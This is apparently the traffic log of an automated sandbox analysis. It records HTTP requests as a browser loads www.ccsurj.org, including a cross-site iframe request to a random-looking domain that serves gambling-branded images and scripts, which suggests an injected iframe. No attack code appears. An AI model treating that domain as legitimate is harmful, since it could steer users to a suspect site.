Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.ccsurj.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/21/11/25/1p6vg4xelj/banner-4.jpg HTTP/1.1Host: www.ccsurj.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ccsurj.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/21/11/25/1p6vg4xelj/banner-5.jpg HTTP/1.1Host: www.ccsurj.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/tt_bg.png HTTP/1.1Host: www.ccsurj.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/slider-arrow.png HTTP/1.1Host: www.ccsurj.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/ico_tz.png HTTP/1.1Host: www.ccsurj.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /css/style.css HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://1k4ej4j1lxvjwz.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /css/modalStyles.css HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://1k4ej4j1lxvjwz.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /css/bootstrap.min.css HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://1k4ej4j1lxvjwz.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery.min.js HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://1k4ej4j1lxvjwz.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /popper.min.js HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://1k4ej4j1lxvjwz.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /system/resource/js/ajax.js HTTP/1.1Host: www.ccsurj.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ccsurj.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /system/resource/js/openlink.js HTTP/1.1Host: www.ccsurj.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ccsurj.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/21/11/25/1p6vg4xelj/banner-1.jpg HTTP/1.1Host: www.ccsurj.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /@public/js.js HTTP/1.1Host: www.ccsurj.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ccsurj.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /__local/7/57/19/8893B54885AD47B81497E346099_E950D003_146A63.png HTTP/1.1Host: www.ccsurj.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ccsurj.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/21/11/25/1p6vg4xelj/banner-2.jpg HTTP/1.1Host: www.ccsurj.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /__local/0/D8/B4/2A6083AF30532CABE26DE75AE3C_48A88581_1249E8.png HTTP/1.1Host: www.ccsurj.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ccsurj.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bootstrap.min.js HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://1k4ej4j1lxvjwz.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /__local/F/3A/FA/D3291F0B28550FCE05C6FD5AA87_291DC08D_1634EF4.png HTTP/1.1Host: www.ccsurj.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ccsurj.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /t010e288a56a0b005e9.png HTTP/1.1Host: p.ssl.qhimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ccsurj.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/21/11/25/1p6vg4xelj/banner-4.jpg HTTP/1.1Host: www.ccsurj.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /system/resource/js/openlink.js HTTP/1.1Host: www.ccsurj.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /__local/1/3B/E2/0973C37817A5D1570D2AED02D91_1A4F1A29_14F98C.png HTTP/1.1Host: www.ccsurj.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ccsurj.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /system/resource/js/ajax.js HTTP/1.1Host: www.ccsurj.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /__local/B/84/EC/5622D797980B35FCB8DD953CE4C_265C0032_E9AE.jpeg?e=.jpeg HTTP/1.1Host: www.ccsurj.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ccsurj.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /banner.js HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://1k4ej4j1lxvjwz.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /@public/js.js HTTP/1.1Host: www.ccsurj.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /__local/2/47/D4/4F14A7A9A01E0D52B998F0FADA0_DD410FA8_1601EC.png?e=.png HTTP/1.1Host: www.ccsurj.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ccsurj.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /imgs/gf.fc8d6758.png HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://1k4ej4j1lxvjwz.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /imgs/banner/banner.365.png HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://1k4ej4j1lxvjwz.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /popper.min.js HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery.min.js HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bootstrap.min.js HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /imgs/xinpujing.png HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://1k4ej4j1lxvjwz.com/css/style.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /imgs/bg.lanse.jpg HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://1k4ej4j1lxvjwz.com/css/style.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /imgs/kaiyun.png HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://1k4ej4j1lxvjwz.com/css/style.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /imgs/sansanqiqi.png HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://1k4ej4j1lxvjwz.com/css/style.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /banner.js HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /__local/7/57/19/8893B54885AD47B81497E346099_E950D003_146A63.png HTTP/1.1Host: www.ccsurj.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /__local/B/84/EC/5622D797980B35FCB8DD953CE4C_265C0032_E9AE.jpeg?e=.jpeg HTTP/1.1Host: www.ccsurj.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /imgs/bet365.png HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://1k4ej4j1lxvjwz.com/css/style.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /imgs/gf.fc8d6758.png HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /imgs/banner/banner.365.png HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /imgs/wlxe.png HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://1k4ej4j1lxvjwz.com/css/style.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /t010e288a56a0b005e9.png HTTP/1.1Host: p.ssl.qhimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /imgs/xinpujing.png HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /imgs/leijingji.png HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://1k4ej4j1lxvjwz.com/css/style.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
